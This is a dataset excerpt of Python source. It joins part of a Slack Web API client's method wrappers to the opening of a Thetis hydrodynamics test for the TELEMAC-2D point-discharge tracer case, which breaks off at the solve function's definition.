channel (str): Private channel to set reading cursor in. e.g. 'C1234567890'
ts (str): Timestamp of the most recently seen message. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("groups.mark", json=kwargs)
def groups_open(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Opens a private channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.open", json=kwargs)
def groups_rename(
self, *, channel: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Renames a private channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
name (str): The new channel name. e.g. 'newchannel'
"""
kwargs.update({"channel": channel, "name": name})
return self.api_call("groups.rename", json=kwargs)
def groups_replies(
self, *, channel: str, thread_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a private channel
Args:
channel (str): The channel id. e.g. 'C1234567890'
thread_ts (str): The timestamp of an existing message with 0 or more replies.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "thread_ts": thread_ts})
return self.api_call("groups.replies", http_verb="GET", params=kwargs)
def groups_setPurpose(
self, *, channel: str, purpose: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the purpose for a private channel.
Args:
channel (str): The channel id. e.g. 'G1234567890'
purpose (str): The new purpose for the channel. e.g. 'My Purpose'
"""
kwargs.update({"channel": channel, "purpose": purpose})
return self.api_call("groups.setPurpose", json=kwargs)
def groups_setTopic(
self, *, channel: str, topic: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the topic for a private channel.
Args:
channel (str): The channel id. e.g. 'G1234567890'
topic (str): The new topic for the channel. e.g. 'My Topic'
"""
kwargs.update({"channel": channel, "topic": topic})
return self.api_call("groups.setTopic", json=kwargs)
def groups_unarchive(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Unarchives a private channel.
Args:
channel (str): The channel id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.unarchive", json=kwargs)
def im_close(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Close a direct message channel.
Args:
channel (str): Direct message channel to close. e.g. 'D1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("im.close", json=kwargs)
def im_history(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Fetches history of messages and events from direct message channel.
Args:
channel (str): Direct message channel to fetch history from. e.g. 'D1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("im.history", http_verb="GET", params=kwargs)
def im_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists direct message channels for the calling user."""
return self.api_call("im.list", http_verb="GET", params=kwargs)
def im_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a direct message channel.
Args:
channel (str): Direct message channel to set reading cursor in. e.g. 'D1234567890'
ts (str): Timestamp of the most recently seen message. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("im.mark", json=kwargs)
def im_open(self, *, user: str, **kwargs) -> Union[Future, SlackResponse]:
"""Opens a direct message channel.
Args:
user (str): The user id to open a DM with. e.g. 'W1234567890'
"""
kwargs.update({"user": user})
return self.api_call("im.open", json=kwargs)
def im_replies(
self, *, channel: str, thread_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a direct message conversation
Args:
channel (str): Direct message channel to fetch thread from. e.g. 'C1234567890'
thread_ts (str): The timestamp of an existing message with 0 or more replies.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "thread_ts": thread_ts})
return self.api_call("im.replies", http_verb="GET", params=kwargs)
def migration_exchange(
self, *, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""For Enterprise Grid workspaces, map local user IDs to global user IDs
Args:
users (str or list): A list of user ids, up to 400 per request.
e.g. ['W1234567890', 'U2345678901', 'U3456789012']
"""
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("migration.exchange", http_verb="GET", params=kwargs)
def mpim_close(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Closes a multiparty direct message channel.
Args:
channel (str): Multiparty Direct message channel to close. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("mpim.close", json=kwargs)
def mpim_history(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Fetches history of messages and events from a multiparty direct message.
Args:
channel (str): Multiparty direct message to fetch history for. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("mpim.history", http_verb="GET", params=kwargs)
def mpim_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists multiparty direct message channels for the calling user."""
return self.api_call("mpim.list", http_verb="GET", params=kwargs)
def mpim_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a multiparty direct message channel.
Args:
channel (str): Multiparty direct message channel to set reading cursor in.
e.g. 'G1234567890'
ts (str): Timestamp of the most recently seen message.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("mpim.mark", json=kwargs)
def mpim_open(
self, *, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""This method opens a multiparty direct message.
Args:
users (str or list): A lists of user ids. The ordering of the users
is preserved whenever a MPIM group is returned.
e.g. ['W1234567890', 'U2345678901', 'U3456789012']
"""
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("mpim.open", params=kwargs)
def mpim_replies(
self, *, channel: str, thread_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a direct message conversation from a
multiparty direct message.
Args:
channel (str): Multiparty direct message channel to fetch thread from.
e.g. 'G1234567890'
thread_ts (str): Unique identifier of a thread's parent message.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "thread_ts": thread_ts})
return self.api_call("mpim.replies", http_verb="GET", params=kwargs)
def oauth_v2_access(
self,
*,
client_id: str,
client_secret: str,
# This field is required when processing the OAuth redirect URL requests
# while it's absent for token rotation
code: Optional[str] = None,
redirect_uri: Optional[str] = None,
# This field is required for token rotation
grant_type: Optional[str] = None,
# This field is required for token rotation
refresh_token: Optional[str] = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Exchanges a temporary OAuth verifier code for an access token.
Args:
client_id (str): Issued when you created your application. e.g. '4b39e9-752c4'
client_secret (str): Issued when you created your application. e.g. '33fea0113f5b1'
code (str): The code param returned via the OAuth callback. e.g. 'ccdaa72ad'
redirect_uri (optional str): Must match the originally submitted URI
(if one was sent). e.g. 'https://example.com'
grant_type: The grant type. The possible value is only 'refresh_token' as of July 2021.
refresh_token: The refresh token for token rotation.
"""
if redirect_uri is not None:
kwargs.update({"redirect_uri": redirect_uri})
if code is not None:
kwargs.update({"code": code})
if grant_type is not None:
kwargs.update({"grant_type": grant_type})
if refresh_token is not None:
kwargs.update({"refresh_token": refresh_token})
return self.api_call(
"oauth.v2.access",
data=kwargs,
auth={"client_id": client_id, "client_secret": client_secret},
)
def oauth_access(
self,
*,
client_id: str,
client_secret: str,
code: str,
redirect_uri: Optional[str] = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Exchanges a temporary OAuth verifier code for an access token.
Args:
client_id (str): Issued when you created your application. e.g. '4b39e9-752c4'
client_secret (str): Issued when you created your application. e.g. '33fea0113f5b1'
code (str): The code param returned via the OAuth callback. e.g. 'ccdaa72ad'
redirect_uri (optional str): Must match the originally submitted URI
(if one was sent). e.g. 'https://example.com'
"""
if redirect_uri is not None:
kwargs.update({"redirect_uri": redirect_uri})
kwargs.update({"code": code})
return self.api_call(
"oauth.access",
data=kwargs,
auth={"client_id": client_id, "client_secret": client_secret},
)
def oauth_v2_exchange(
self, *, token: str, client_id: str, client_secret: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Exchanges a legacy access token for a new expiring access token and refresh token
Args:
token: The legacy xoxb or xoxp token being migrated to use token rotation.
client_id: Issued when you created your application.
client_secret: Issued when you created your application.
"""
kwargs.update(
{"client_id": client_id, "client_secret": client_secret, "token": token}
)
return self.api_call("oauth.v2.exchange", params=kwargs)
def openid_connect_token(
self,
client_id: str,
client_secret: str,
code: Optional[str] = None,
redirect_uri: Optional[str] = None,
grant_type: Optional[str] = None,
refresh_token: Optional[str] = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Exchanges a temporary OAuth verifier code for an access token for Sign in with Slack.
Args:
client_id (str): Issued when you created your application.
client_secret (str): Issued when you created your application.
code (str): The code param returned via the OAuth callback.
redirect_uri (optional str): This must match the originally submitted URI (if one was sent).
grant_type: The grant_type param as described in the OAuth spec.
refresh_token: The refresh_token param as described in the OAuth spec.
"""
if redirect_uri is not None:
kwargs.update({"redirect_uri": redirect_uri})
if code is not None:
kwargs.update({"code": code})
if grant_type is not None:
kwargs.update({"grant_type": grant_type})
if refresh_token is not None:
kwargs.update({"refresh_token": refresh_token})
return self.api_call(
"openid.connect.token",
data=kwargs,
auth={"client_id": client_id, "client_secret": client_secret},
)
def openid_connect_userInfo(self, **kwargs) -> Union[Future, SlackResponse]:
"""Get the identity of a user who has authorized Sign in with Slack."""
return self.api_call("openid.connect.userInfo", params=kwargs)
def pins_add(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Pins an item to a channel.
Args:
channel (str): Channel to pin the item in. e.g. 'C1234567890'
file (str): File id to pin. e.g. 'F1234567890'
file_comment (str): File comment to pin. e.g. 'Fc1234567890'
timestamp (str): Timestamp of message to pin. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel})
return self.api_call("pins.add", json=kwargs)
def pins_list(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Lists items pinned to a channel.
Args:
channel (str): Channel to get pinned items for. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("pins.list", http_verb="GET", params=kwargs)
def pins_remove(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Un-pins an item from a channel.
Args:
channel (str): Channel to pin the item in. e.g. 'C1234567890'
file (str): File id to pin. e.g. 'F1234567890'
file_comment (str): File comment to pin. e.g. 'Fc1234567890'
timestamp (str): Timestamp of message to pin. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel})
return self.api_call("pins.remove", json=kwargs)
def reactions_add(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Adds a reaction to an item.
Args:
name (str): Reaction (emoji) name. e.g. 'thumbsup'
channel (str): Channel where the message to add reaction to was posted.
e.g. 'C1234567890'
timestamp (str): Timestamp of the message to add reaction to. e.g. '1234567890.123456'
"""
kwargs.update({"name": name})
return self.api_call("reactions.add", json=kwargs)
def reactions_get(self, **kwargs) -> Union[Future, SlackResponse]:
"""Gets reactions for an item."""
return self.api_call("reactions.get", http_verb="GET", params=kwargs)
def reactions_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists reactions made by a user."""
return self.api_call("reactions.list", http_verb="GET", params=kwargs)
def reactions_remove(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Removes a reaction from an item.
Args:
name (str): Reaction (emoji) name. e.g. 'thumbsup'
"""
kwargs.update({"name": name})
return self.api_call("reactions.remove", json=kwargs)
def reminders_add(
self, *, text: str, time: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Creates a reminder.
Args:
text (str): The content of the reminder. e.g. 'eat a banana'
time (str): When this reminder should happen:
the Unix timestamp (up to five years from now e.g. '1602288000'),
the number of seconds until the reminder (if within 24 hours),
or a natural language description (Ex. 'in 15 minutes' or 'every Thursday')
"""
kwargs.update({"text": text, "time": time})
return self.api_call("reminders.add", json=kwargs)
def reminders_complete(
self, *, reminder: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Marks a reminder as complete.
Args:
reminder (str): The ID of the reminder to be marked as complete.
e.g. 'Rm12345678'
"""
kwargs.update({"reminder": reminder})
return self.api_call("reminders.complete", json=kwargs)
def reminders_delete(
self, *, reminder: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Deletes a reminder.
Args:
reminder (str): The ID of the reminder. e.g. 'Rm12345678'
"""
kwargs.update({"reminder": reminder})
return self.api_call("reminders.delete", json=kwargs)
def reminders_info(
self, *, reminder: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Gets information about a reminder.
Args:
reminder (str): The ID of the reminder. e.g. 'Rm12345678'
"""
kwargs.update({"reminder": reminder})
return self.api_call("reminders.info", http_verb="GET", params=kwargs)
def reminders_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all reminders created by or for a given user."""
return self.api_call("reminders.list", http_verb="GET", params=kwargs)
def rtm_connect(self, **kwargs) -> Union[Future, SlackResponse]:
"""Starts a Real Time Messaging session."""
return self.api_call("rtm.connect", http_verb="GET", params=kwargs)
def rtm_start(self, **kwargs) -> Union[Future, SlackResponse]:
"""Starts a Real Time Messaging session."""
return self.api_call("rtm.start", http_verb="GET", params=kwargs)
def search_all(self, *, query: str, **kwargs) -> Union[Future, SlackResponse]:
"""Searches for messages and files matching a query.
Args:
query (str): Search query. May contains booleans, etc.
e.g. 'pickleface'
"""
kwargs.update({"query": query})
return self.api_call("search.all", http_verb="GET", params=kwargs)
def search_files(self, *, query: str, **kwargs) -> Union[Future, SlackResponse]:
"""Searches for files matching a query.
Args:
query (str): Search query. May contains booleans, etc.
e.g. 'pickleface'
"""
kwargs.update({"query": query})
return self.api_call("search.files", http_verb="GET", params=kwargs)
def search_messages(self, *, query: str, **kwargs) -> Union[Future, SlackResponse]:
"""Searches for messages matching a query.
Args:
query (str): Search query. May contains booleans, etc.
e.g. 'pickleface'
"""
kwargs.update({"query": query})
return self.api_call("search.messages", http_verb="GET", params=kwargs)
def stars_add(self, **kwargs) -> Union[Future, SlackResponse]:
"""Adds a star to an item.
Args:
channel (str): Channel to add star to, or channel where the message to add
star to was posted (used with timestamp). e.g. 'C1234567890'
file (str): File to add star to. e.g. 'F1234567890'
file_comment (str): File comment to add star to. e.g. 'Fc1234567890'
timestamp (str): Timestamp of the message to add star to. e.g. '1234567890.123456'
"""
return self.api_call("stars.add", json=kwargs)
def stars_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists stars for a user."""
return self.api_call("stars.list", http_verb="GET", params=kwargs)
def stars_remove(self, **kwargs) -> Union[Future, SlackResponse]:
"""Removes a star from an item.
Args:
channel (str): Channel to remove star from, or channel where
the message to remove star from was posted (used with timestamp). e.g. 'C1234567890'
file (str): File to remove star from. e.g. 'F1234567890'
file_comment (str): File comment to remove star from. e.g. 'Fc1234567890'
timestamp (str): Timestamp of the message to remove star from. e.g. '1234567890.123456'
"""
return self.api_call("stars.remove", json=kwargs)
def team_accessLogs(self, **kwargs) -> Union[Future, SlackResponse]:
"""Gets the access logs for the current team."""
return self.api_call("team.accessLogs", http_verb="GET", params=kwargs)
def team_billableInfo(self, **kwargs) -> Union[Future, SlackResponse]:
"""Gets billable users information for the current team."""
return self.api_call("team.billableInfo", http_verb="GET", params=kwargs)
def team_info(self, **kwargs) -> Union[Future, SlackResponse]:
"""Gets information about the current team."""
return self.api_call("team.info", http_verb="GET", params=kwargs)
def team_integrationLogs(self, **kwargs) -> Union[Future, SlackResponse]:
"""Gets the integration logs for the current team."""
return self.api_call("team.integrationLogs", http_verb="GET", params=kwargs)
def team_profile_get(self, **kwargs) -> Union[Future, SlackResponse]:
"""Retrieve a team's profile."""
return self.api_call("team.profile.get", http_verb="GET", params=kwargs)
def usergroups_create(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Create a User Group
Args:
name (str): A name for the User Group. Must be unique among User Groups.
e.g. 'My Test Team'
"""
kwargs.update({"name": name})
return self.api_call("usergroups.create", json=kwargs)
def usergroups_disable(
self, *, usergroup: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Disable an existing User Group
Args:
usergroup (str): The encoded ID of the User Group to disable.
e.g. 'S0604QSJC'
"""
kwargs.update({"usergroup": usergroup})
return self.api_call("usergroups.disable", json=kwargs)
def usergroups_enable(
self, *, usergroup: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Enable a User Group
Args:
usergroup (str): The encoded ID of the User Group to enable.
e.g. 'S0604QSJC'
"""
kwargs.update({"usergroup": usergroup})
return self.api_call("usergroups.enable", json=kwargs)
def usergroups_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List all User Groups for a team"""
return self.api_call("usergroups.list", http_verb="GET", params=kwargs)
def usergroups_update(
self, *, usergroup: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Update an existing User Group
Args:
usergroup (str): The encoded ID of the User Group to update.
e.g. 'S0604QSJC'
"""
kwargs.update({"usergroup": usergroup})
return self.api_call("usergroups.update", json=kwargs)
def usergroups_users_list(
self, *, usergroup: str, **kwargs
) -> Union[Future, SlackResponse]:
"""List all users in a User Group
Args:
usergroup (str): The encoded ID of the User Group to update.
e.g. 'S0604QSJC'
"""
kwargs.update({"usergroup": usergroup})
return self.api_call("usergroups.users.list", http_verb="GET", params=kwargs)
def usergroups_users_update(
self, *, usergroup: str, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Update the list of users for a User Group
Args:
usergroup (str): The encoded ID of the User Group to update.
e.g. 'S0604QSJC'
users (str or list): A list user IDs that represent the entire list of
users for the User Group. e.g. ['U060R4BJ4', 'U060RNRCZ']
"""
kwargs.update({"usergroup": usergroup})
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("usergroups.users.update", params=kwargs)
def users_conversations(self, **kwargs) -> Union[Future, SlackResponse]:
"""List conversations the calling user may access."""
return self.api_call("users.conversations", http_verb="GET", params=kwargs)
def users_deletePhoto(self, **kwargs) -> Union[Future, SlackResponse]:
"""Delete the user profile photo"""
return self.api_call("users.deletePhoto", http_verb="GET", params=kwargs)
def users_getPresence(self, *, user: str, **kwargs) -> Union[Future, SlackResponse]:
"""Gets user presence information.
Args:
user (str): User to get presence info on. Defaults to the authed user.
e.g. 'W1234567890'
"""
kwargs.update({"user": user})
return self.api_call("users.getPresence", http_verb="GET", params=kwargs)
def users_identity(self, **kwargs) -> Union[Future, SlackResponse]:
"""Get a user's identity."""
return self.api_call("users.identity", http_verb="GET", params=kwargs)
def users_info(self, *, user: str, **kwargs) -> Union[Future, SlackResponse]:
"""Gets information about a user.
Args:
user (str): User to get info on.
e.g. 'W1234567890'
"""
kwargs.update({"user": user})
return self.api_call("users.info", http_verb="GET", params=kwargs)
def users_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all users in a Slack team."""
return self.api_call("users.list", http_verb="GET", params=kwargs)
def users_lookupByEmail(
self, *, email: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Find a user with an email address.
Args:
email (str): An email address belonging to a user in the workspace.
e.g. 'spengler@ghostbusters.example.com'
"""
kwargs.update({"email": email})
return self.api_call("users.lookupByEmail", http_verb="GET", params=kwargs)
def users_setPhoto(
self, *, image: Union[str, IOBase], **kwargs
) -> Union[Future, SlackResponse]:
"""Set the user profile photo
Args:
image (str): Supply the path of the image you'd like to upload.
e.g. 'myimage.png'
"""
return self.api_call("users.setPhoto", files={"image": image}, data=kwargs)
def users_setPresence(
self, *, presence: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Manually sets user presence.
Args:
presence (str): Either 'auto' or 'away'.
"""
kwargs.update({"presence": presence})
return self.api_call("users.setPresence", json=kwargs)
def users_profile_get(self, **kwargs) -> Union[Future, SlackResponse]:
"""Retrieves a user's profile information."""
return self.api_call("users.profile.get", http_verb="GET", params=kwargs)
def users_profile_set(self, **kwargs) -> Union[Future, SlackResponse]:
"""Set the profile information for a user."""
return self.api_call("users.profile.set", json=kwargs)
def views_open(
self, *, trigger_id: str, view: Union[dict, View], **kwargs
) -> Union[Future, SlackResponse]:
"""Open a view for a user.
See https://api.slack.com/block-kit/surfaces/modals for details.
Args:
trigger_id (str): Exchange a trigger to post to the user.
e.g. '12345.98765.abcd2358fdea'
view (dict or View): The view payload.
"""
kwargs.update({"trigger_id": trigger_id})
if isinstance(view, View):
kwargs.update({"view": view.to_dict()})
else:
kwargs.update({"view": view})
return self.api_call("views.open", json=kwargs)
def views_push(
self, *, trigger_id: str, view: Union[dict, View], **kwargs
) -> Union[Future, SlackResponse]:
"""Push a view onto the stack of a root view.
Push a new view onto the existing view stack by passing a view
payload and a valid trigger_id generated from an interaction
within the existing modal.
Read the modals documentation (https://api.slack.com/block-kit/surfaces/modals)
to learn more about the lifecycle and intricacies of views.
Args:
trigger_id (str): Exchange a trigger to post to the user.
e.g. '12345.98765.abcd2358fdea'
view (dict or View): The view payload.
"""
kwargs.update({"trigger_id": trigger_id, "view": view})
if isinstance(view, View):
kwargs.update({"view": view.to_dict()})
else:
kwargs.update({"view": view})
return self.api_call("views.push", json=kwargs)
def views_update(
self,
*,
view: Union[dict, View],
external_id: str = None,
view_id: str = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Update an existing view.
Update a view by passing a new view definition along with the
view_id returned in views.open or the external_id.
See the modals documentation (https://api.slack.com/block-kit/surfaces/modals#updating_views)
to learn more about updating views and avoiding race conditions with the hash argument.
Args:
view (dict or View): The view payload.
external_id (str): A unique identifier of the view set by the developer.
e.g. 'bmarley_view2'
view_id (str): A unique identifier of the view to be updated.
e.g. 'VMM512F2U'
Raises:
SlackRequestError: Either view_id or external_id is required.
"""
if isinstance(view, View):
kwargs.update({"view": view.to_dict()})
else:
kwargs.update({"view": view})
if external_id:
kwargs.update({"external_id": external_id})
elif view_id:
kwargs.update({"view_id": view_id})
else:
raise e.SlackRequestError("Either view_id or external_id is required.")
return self.api_call("views.update", json=kwargs)
def views_publish(
self, *, user_id: str, view: Union[dict, View], **kwargs
) -> Union[Future, SlackResponse]:
"""Publish a static view for a User.
Create or update the view that comprises an
app's Home tab (https://api.slack.com/surfaces/tabs)
for a specific user.
Args:
user_id (str): id of the user you want publish a view to.
e.g. 'U0BPQUNTA'
view (dict or View): The view payload.
"""
kwargs.update({"user_id": user_id})
if isinstance(view, View):
kwargs.update({"view": view.to_dict()})
else:
kwargs.update({"view": view})
return self.api_call("views.publish", json=kwargs)
def workflows_stepCompleted(
self, *, workflow_step_execute_id: str, outputs: dict = None, **kwargs
) -> Union[Future, SlackResponse]:
"""Indicate a successful outcome of a workflow step's execution.
Args:
workflow_step_execute_id (str): A unique identifier of the workflow step to be updated.
e.g. 'add_task'
outputs (dict): A key-value object of outputs from your step.
e.g. { 'task_name': 'Task Name' }
"""
kwargs.update({"workflow_step_execute_id": workflow_step_execute_id})
if outputs:
kwargs.update({"outputs": outputs})
return self.api_call("workflows.stepCompleted", json=kwargs)
def workflows_stepFailed(
self, *, workflow_step_execute_id: str, error: dict, **kwargs
) -> Union[Future, SlackResponse]:
"""Indicate an unsuccessful outcome of a workflow step's execution.
Args:
workflow_step_execute_id (str): A unique identifier of the workflow step to be updated.
e.g. 'add_task'
error (dict): A dict with a message property that contains a human readable error message
e.g. { message: 'Step failed to execute.' }
"""
kwargs.update(
{"workflow_step_execute_id": workflow_step_execute_id, "error": error}
)
return self.api_call("workflows.stepFailed", json=kwargs)
def workflows_updateStep(
self,
*,
workflow_step_edit_id: str,
inputs: dict = None,
outputs: list = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Update the configuration for a workflow extension step.
Args:
workflow_step_edit_id (str): A unique identifier of the workflow step to be updated.
e.g. 'add_task'
inputs (dict): A key-value object of inputs required from a user during step configuration.
e.g. { 'title': { 'value': 'The Title' }, 'submitter': { 'value': 'The Submitter' } }
outputs (list): A list of output objects used during step execution.
e.g. [{ 'type': 'text', 'name': 'title', 'label': 'Title' }]
"""
kwargs.update({"workflow_step_edit_id": workflow_step_edit_id})
if inputs:
kwargs.update({"inputs": inputs})
if outputs:
kwargs.update({"outputs": outputs})
return self.api_call("workflows.updateStep", json=kwargs)
| 40.293881
| 125
| 0.605527
|
acff731be2acac769c0dceac6f639223feeb6377
| 14,175
|
py
|
Python
|
test/tracerEq/test_point_discharge.py
|
thetisproject/cofs
|
42dccc62a9cbdfd3103031df6144de207b32189e
|
[
"MIT"
] | null | null | null |
test/tracerEq/test_point_discharge.py
|
thetisproject/cofs
|
42dccc62a9cbdfd3103031df6144de207b32189e
|
[
"MIT"
] | null | null | null |
test/tracerEq/test_point_discharge.py
|
thetisproject/cofs
|
42dccc62a9cbdfd3103031df6144de207b32189e
|
[
"MIT"
] | null | null | null |
"""
TELEMAC-2D `Point Discharge with Diffusion' test case
=====================================================
Solves a steady-state tracer advection equation in a
rectangular domain with uniform fluid velocity, constant
diffusivity and a constant tracer source term. Neumann
conditions are imposed on the channel walls, an inflow
condition is imposed on the left-hand boundary, and the
right-hand boundary remains open. An analytical solution
involving modified Bessel functions exists [1].
The two different functional quantities of interest considered
in [2] are evaluated on each mesh and convergence is assessed.
A Gaussian parametrisation for the point source is adopted,
with the radius calibrated using gradient-based optimisation.
Further details for the test case can be found in [1].
[1] A. Riadh, G. Cedric, M. Jean, "TELEMAC modeling system:
2D hydrodynamics TELEMAC-2D software release 7.0 user
manual." Paris: R&D, Electricite de France, p. 134
(2014).
[2] J.G. Wallwork, N. Barral, D.A. Ham, M.D. Piggott,
"Goal-Oriented Error Estimation and Mesh Adaptation for
Tracer Transport Modelling", submitted to Computer
Aided Design (2021).
[3] B.P. Flannery, W.H. Press, S.A. Teukolsky, W. Vetterling,
"Numerical recipes in C", Press Syndicate of the University
of Cambridge, New York (1992).
"""
from thetis import *
import thetis.diagnostics as diagnostics
import pytest
def bessi0(x):
"""
Modified Bessel function of the first kind. Code taken from [3].
"""
ax = abs(x)
y1 = x/3.75
y1 *= y1
expr1 = 1.0 + y1*(3.5156229 + y1*(3.0899424 + y1*(1.2067492 + y1*(
0.2659732 + y1*(0.360768e-1 + y1*0.45813e-2)))))
y2 = 3.75/ax
expr2 = exp(ax)/sqrt(ax)*(0.39894228 + y2*(0.1328592e-1 + y2*(
0.225319e-2 + y2*(-0.157565e-2 + y2*(0.916281e-2 + y2*(
-0.2057706e-1 + y2*(0.2635537e-1 + y2*(-0.1647633e-1 + y2*0.392377e-2))))))))
return conditional(le(ax, 3.75), expr1, expr2)
def bessk0(x):
"""
Modified Bessel function of the second kind. Code taken from [3].
"""
y1 = x*x/4.0
expr1 = -ln(x/2.0)*bessi0(x) + (-0.57721566 + y1*(0.42278420 + y1*(
0.23069756 + y1*(0.3488590e-1 + y1*(0.262698e-2 + y1*(0.10750e-3 + y1*0.74e-5))))))
y2 = 2.0/x
expr2 = exp(-x)/sqrt(x)*(1.25331414 + y2*(-0.7832358e-1 + y2*(0.2189568e-1 + y2*(
-0.1062446e-1 + y2*(0.587872e-2 + y2*(-0.251540e-2 + y2*0.53208e-3))))))
return conditional(ge(x, 2), expr2, expr1)
class PointDischargeParameters(object):
"""
Problem parameter class, including point source representation.
Delta functions are difficult to represent in numerical models. Here we
use a Gaussian approximation with a small radius. The small radius has
been calibrated against the analytical solution. See [2] for details.
"""
def __init__(self, offset, tracer_element_family):
self.offset = offset
# Physical parameters
self.diffusivity = Constant(0.1)
self.viscosity = None
self.drag = Constant(0.0025)
self.uv = Constant(as_vector([1.0, 0.0]))
self.elev = Constant(0.0)
# Parametrisation of point source
self.source_x, self.source_y = 2.0, 5.0
self.source_r = 0.05606298 if tracer_element_family == 'dg' else 0.05606388
self.source_value = 100.0
# Specification of receiver region
self.receiver_x = 20.0
self.receiver_y = 7.5 if self.offset else 5.0
self.receiver_r = 0.5
# Boundary conditions
self.boundary_conditions = {
'tracer': {
1: {'value': Constant(0.0)}, # inflow
# ouflow -> natural BC
},
'shallow_water': {
1: {
'uv': Constant(as_vector([1.0, 0.0])),
'elev': Constant(0.0)
}, # inflow
2: {
'uv': Constant(as_vector([1.0, 0.0])),
'elev': Constant(0.0)
}, # outflow
}
}
def ball(self, mesh, scaling=1.0, eps=1.0e-10):
x, y = SpatialCoordinate(mesh)
expr = lt((x-self.receiver_x)**2 + (y-self.receiver_y)**2, self.receiver_r**2 + eps)
return conditional(expr, scaling, 0.0)
def gaussian(self, mesh, scaling=1.0):
x, y = SpatialCoordinate(mesh)
expr = exp(-((x-self.source_x)**2 + (y-self.source_y)**2)/self.source_r**2)
return scaling*expr
def source(self, fs):
return self.gaussian(fs.mesh(), scaling=self.source_value)
def bathymetry(self, fs):
return Function(fs).assign(5.0)
def quantity_of_interest_kernel(self, mesh):
area = assemble(self.ball(mesh)*dx)
area_analytical = pi*self.receiver_r**2
scaling = 1.0 if numpy.allclose(area, 0.0) else area_analytical/area
return self.ball(mesh, scaling=scaling)
def quantity_of_interest_form(self, sol):
kernel = self.quantity_of_interest_kernel(sol.function_space().mesh())
return inner(kernel, sol)*dx(degree=12)
def quantity_of_interest(self, sol):
return assemble(self.quantity_of_interest_form(sol))
def analytical_quantity_of_interest(self, mesh):
"""
The analytical solution can be found in [1]. Due to the modified
Bessel function, it cannot be evaluated exactly and instead must
be computed using a quadrature rule.
"""
x, y = SpatialCoordinate(mesh)
x0, y0 = self.source_x, self.source_y
u = self.uv[0]
D = self.diffusivity
Pe = 0.5*u/D # Mesh Peclet number
r = sqrt((x-x0)*(x-x0) + (y-y0)*(y-y0))
r = max_value(r, self.source_r) # (Bessel fn explodes at (x0, y0))
sol = 0.5/(pi*D)*exp(Pe*(x-x0))*bessk0(Pe*r)
kernel = self.quantity_of_interest_kernel(mesh)
return assemble(kernel*sol*dx(degree=12))
def solve_tracer(mesh2d, offset, hydrodynamics=False, solve_adjoint=False, **model_options):
"""
